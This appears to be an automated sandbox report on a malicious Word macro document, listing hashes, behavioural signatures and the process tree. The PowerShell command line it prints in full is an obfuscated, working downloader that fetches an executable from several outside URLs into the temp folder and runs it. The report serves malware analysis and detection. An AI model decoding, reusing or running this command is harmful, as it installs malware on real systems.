Analysis
- max time kernel: 19s
- max time network: 18s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 26/11/2020, 09:32
Static task: static1
Behavioral task: behavioral1
Sample: cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410.doc
Resource: win10v20201028
General
- Target: cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410.doc
- Size: 337KB
- MD5: cf9c2ff0e5ca4d7c91d05d8bc8e6a710
- SHA1: 586d42846bd67b726606c4e7325bcc0a3339bec3
- SHA256: cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410
- SHA512: fd517573dc26a6bc698f44dbc9af57d894363a566b053a81ca0e5030bc2039d1bdf94da548afcebf0a831dc80d7294395a936a2f919dda3bff9376f0208014e4
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target | Parent
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2992 | 756 | PowERsHell.exe | 67 |
- Blacklisted process makes network request (3 IoCs)
  flow | pid | Process
  15 | 2992 | PowERsHell.exe
  19 | 2992 | PowERsHell.exe
  21 | 2992 | PowERsHell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  pid | Process
  756 | WINWORD.EXE
  756 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid | Process
  2992 | PowERsHell.exe
  2992 | PowERsHell.exe
  2992 | PowERsHell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 2992 | PowERsHell.exe
- Suspicious use of SetWindowsHookEx (8 IoCs)
  pid | Process
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
  756 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (2 IoCs)
  description | pid | Process | procid_target
  PID 756 wrote to memory of 2992 | 756 | WINWORD.EXE | 75
  PID 756 wrote to memory of 2992 | 756 | WINWORD.EXE | 75
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cc0a345e8f33b676e64bb8624a12b7831880bb9d27fc7e30923f239307976410.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 756
  - C:\Windows\System32\WindowsPowerShell\v1.0\PowERsHell.exe (child of PID 756)
    Command line: PowERsHell " iEX ( \" $(SEt-ItEm 'vaRIablE:oFS' '' ) \" + [STRiNg][ChAr[]] ( 36 ,83 , 82 ,106, 61 ,110 ,101, 119 , 45 , 111, 98 ,106 , 101 ,99,116, 32 ,78 , 101, 116, 46, 87 ,101, 98 ,67 , 108,105 , 101,110 ,116 ,59 , 36,85 ,106 , 85,61 , 39, 104,116,116, 112, 58, 47 ,47 , 105 , 122,101, 114, 111 ,110 , 101 , 46, 99,111 , 109, 47 ,119,111 , 114 ,100,112,114 ,101, 115 , 115 , 47, 119, 112,45, 99, 111, 110 , 116 , 101, 110 ,116 ,47 ,104 ,47 ,64 ,104,116 , 116, 112, 58 ,47,47,112, 117,114,119,111 , 115 , 97, 114 , 105 ,116 , 101,107 , 110 ,105, 107, 46, 99 ,111,109 , 47 ,83 ,47, 64, 104 ,116 ,116, 112 ,58 , 47 ,47, 117 , 110, 101 , 97 ,108,46, 101 ,110,100,101, 118,109 , 111 , 100,101, 46 ,99 ,111 , 109 ,47 , 119,112,45 , 99,111, 110 ,116 , 101 , 110,116, 47 ,117,112 , 108,111,97,100, 115 ,47,109 ,105, 104 ,72, 67,71 , 77, 67,47,64 , 104,116 ,116,112 , 58 ,47, 47 ,119 ,119 , 119 ,46, 99 ,111 ,100 , 105,102 , 101 , 116 ,46,99 ,111, 109 ,47, 78 , 84, 98, 87 ,102,56 ,49,47 , 64,104 , 116, 116,112, 58 , 47 , 47 ,119 , 119,119, 46 , 100 , 101,103 , 105 , 111 ,114,103 , 105 , 111,103,105,111 , 105 , 101, 108, 108,105 ,46,99,111,109, 47 , 75,122, 111 , 47 ,39 ,46 , 83, 112,108, 105 , 116,40 , 39,64,39 ,41 , 59 , 36 , 107 ,122 , 122, 32, 61 ,32 ,39,50, 48 ,55 , 39 ,59, 36, 76 , 122 , 84 ,61 , 36 , 101, 110, 118, 58,116 , 101,109 , 112 , 43 ,39 ,92 ,39, 43, 36, 107,122 ,122,43 , 39 , 46,101 ,120 ,101 ,39 , 59, 102,111,114 ,101, 97, 99 , 104 ,40, 36,102 ,105 ,105 , 32 ,105 ,110, 32, 36,85,106,85, 41 , 123 ,116,114 , 121, 123,36 , 83 , 82, 106 ,46 , 68 ,111 ,119,110,108 , 111,97,100 ,70, 105, 108 , 101 , 40,36 ,102, 105,105 ,44, 32 , 36 ,76, 122,84 ,41 , 59 ,83 ,116 ,97 ,114 , 116, 45 , 80,114, 111, 99, 101, 115,115, 32,36,76 ,122 , 84,59, 98,114 ,101, 97 , 107 , 59 ,125, 99,97, 116 ,99 ,104 , 123 ,125, 125) +\"$( sET 'oFS' ' ' ) \" )"
    - Process spawned unexpected child process
    - Blacklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2992